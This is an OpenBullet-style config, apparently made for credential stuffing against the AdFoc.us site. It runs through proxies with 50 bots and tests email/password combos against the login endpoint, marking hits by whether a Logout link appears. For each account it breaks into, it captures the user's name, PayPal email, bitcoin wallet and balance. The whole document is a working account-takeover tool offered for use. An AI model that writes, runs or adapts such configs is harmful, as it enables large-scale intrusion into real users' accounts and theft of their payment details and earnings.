[SETTINGS]
{
  "Name": "ADFOCUS || V0RT3X",
  "SuggestedBots": 50,
  "LastModified": "2019-04-02T16:18:49.7401491+01:00",
  "AdditionalInfo": "",
  "Author": "V0RT3X",
  "Version": "1.0.0",
  "IgnoreResponseErrors": false,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 10,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://adfoc.us/session/create" 
  CONTENT "email=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: ext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3" 
KEYCHECK 
  KEYCHAIN Success OR 
    KEY "<a href=\"/session/destroy\" class=\"header-links\">Logout</a>" 
  KEYCHAIN Failure OR 
    KEY "Enter your e-mail and password below to login to your AdFoc.us account:" 
REQUEST GET "https://adfoc.us/user/account-settings" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
PARSE "<SOURCE>" LR "<input type=\"text\" name=\"user[name]\" value=\"" "\"" -> CAP "Name" 
PARSE "<SOURCE>" LR "<input id=\"paypal_email\" type=\"text\" name=\"user[email_paypal]\" value=\"" "\"" -> CAP "Paypal Email" 
PARSE "<SOURCE>" LR "<input id=\"bitcoin_wallet\" type=\"text\" name=\"user[bitcoin_wallet]\" value=\"" "\"" -> CAP "Btc Address" 
REQUEST GET "https://adfoc.us/payments" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
PARSE "<SOURCE>" LR "<span class=\"balance\" id=\"bold\">" "</span>" -> CAP "Balance" 
